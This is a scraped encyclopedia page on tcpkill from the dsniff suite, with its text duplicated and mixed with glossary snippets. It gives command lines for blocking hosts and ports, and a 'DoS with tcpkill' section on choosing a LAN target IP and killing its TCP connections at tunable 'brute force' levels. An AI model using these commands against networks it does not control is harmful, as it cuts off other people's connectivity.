Tcpkill
Encyclopedia
Tcpkill can be used to kill connections to or from a particular host, network, port, or combination of all. These programs take standard Berkeley Packet Filter
(BPF) filters. This can be used for both port mirroring and arp spoofing
For example, to prevent any connections to the host www.google.com use this command:
/usr/sbin/tcpkill −9 host www.google.com
The computer that is attempting to go to that site will be blocked from that site only, but can surf any other site. It is a good idea to either redirect the output into nothingness ( > 2>/dev/null 1>/dev/null) or into a file for later analysis (> file.tcpkill ). By default, it will redirect output to the console.
More hosts can be specified with the command:
/usr/sbin/tcpkill −9 host www.google.com and host www.yahoo.com
To block well−known ports eg., napster (port 8888 and port 6699) or gnutella (port 6346), the command:
/usr/sbin/tcpkill −9 port 8888 and port 6699
or
/usr/sbin/tcpkill −9 port 6346 --> will do the trick.
or tcpdump
to look at the packets that are being transmitted and to pick a target that you want to deny service. Assume the target has been identified as 192.168.100.38, a simple command like:
tcpkill host -9 192.168.100.38
will kill all outgoing tcp packets (TCP segment) between the target and the rest of the network. Prior to the attack the target can receive packets from the rest of the network.
the -i option specify which interface you want the program to listen on. The default option interface on most computers is eth0, because most computers only have one interface.
-1...9
The -1 to -9 specify the degree of brute force you want the attack to use on the target, with -1 being the least brute and -9 being the most brute.Computers on network with very fast connection usually require more brute force in order to successfully perform a DOS attack on them. Otherwise the command can be run without the -1 to -9 option or the -i option.
----
This is a description of one of the various dsniff
programs. This text belongs to the dsniff
“README” written by the author Dug Song.
See also: filesnarfhttp://www.ouah.org/dsniffintr.htm, macof http://www.ouah.org/dsniffintr.htm, mailsnarfhttp://www.ouah.org/dsniffintr.htm, msfsnarfhttp://www.ouah.org/dsniffintr.htm, sshmitmhttp://www.ouah.org/dsniffintr.htm, tcpnicehttp://www.ouah.org/dsniffintr.htm, urlsnarfhttp://www.ouah.org/dsniffintr.htm webmitmhttp://www.ouah.org/dsniffintr.htm, webspyhttp://www.ouah.org/dsniffintr.htm.
Berkeley Packet Filter
The Berkeley Packet Filter or BPF provides, on some Unix-like systems, a raw interface to data link layers, permitting raw link-layer packets to be sent and received...
(BPF) filters. This can be used for both port mirroring and arp spoofing
ARP spoofing
ARP spoofing, also known as ARP cache poisoning or ARP poison routing , is a technique used to attack a local-area network . ARP spoofing may allow an attacker to intercept data frames on a LAN, modify the traffic, or stop the traffic altogether...
For example, to prevent any connections to the host www.google.com use this command:
/usr/sbin/tcpkill −9 host www.google.com
The computer that is attempting to go to that site will be blocked from that site only, but can surf any other site. It is a good idea to either redirect the output into nothingness ( > 2>/dev/null 1>/dev/null) or into a file for later analysis (> file.tcpkill ). By default, it will redirect output to the console.
More hosts can be specified with the command:
/usr/sbin/tcpkill −9 host www.google.com and host www.yahoo.com
To block well−known ports eg., napster (port 8888 and port 6699) or gnutella (port 6346), the command:
/usr/sbin/tcpkill −9 port 8888 and port 6699
or
/usr/sbin/tcpkill −9 port 6346 --> will do the trick.
DoS with tcpkill
Tcpkill can be used to create a DoS attack within a WAN or LAN, and this can be done by using a sniffer like dsniffDSniff
Dsniff is a password sniffer written by Dug Song and a package of utilities that parse many different application protocols and extract interesting information....
or tcpdump
Tcpdump
tcpdump is a common packet analyzer that runs under the command line. It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached...
to look at the packets that are being transmitted and to pick a target that you want to deny service. Assume the target has been identified as 192.168.100.38, a simple command like:
tcpkill host -9 192.168.100.38
will kill all outgoing tcp packets (TCP segment) between the target and the rest of the network. Prior to the attack the target can receive packets from the rest of the network.
Options
-ithe -i option specify which interface you want the program to listen on. The default option interface on most computers is eth0, because most computers only have one interface.
-1...9
The -1 to -9 specify the degree of brute force you want the attack to use on the target, with -1 being the least brute and -9 being the most brute.Computers on network with very fast connection usually require more brute force in order to successfully perform a DOS attack on them. Otherwise the command can be run without the -1 to -9 option or the -i option.
----
This is a description of one of the various dsniff
DSniff
Dsniff is a password sniffer written by Dug Song and a package of utilities that parse many different application protocols and extract interesting information....
programs. This text belongs to the dsniff
DSniff
Dsniff is a password sniffer written by Dug Song and a package of utilities that parse many different application protocols and extract interesting information....
“README” written by the author Dug Song.
| Name | Description |
|---|---|
| tcpkill | Kills specified in-progress TCP connections (useful for libnids-based applications which require a full TCP 3-whs for TCB creation). Can be effective for bandwidth control. |
See also: filesnarfhttp://www.ouah.org/dsniffintr.htm, macof http://www.ouah.org/dsniffintr.htm, mailsnarfhttp://www.ouah.org/dsniffintr.htm, msfsnarfhttp://www.ouah.org/dsniffintr.htm, sshmitmhttp://www.ouah.org/dsniffintr.htm, tcpnicehttp://www.ouah.org/dsniffintr.htm, urlsnarfhttp://www.ouah.org/dsniffintr.htm webmitmhttp://www.ouah.org/dsniffintr.htm, webspyhttp://www.ouah.org/dsniffintr.htm.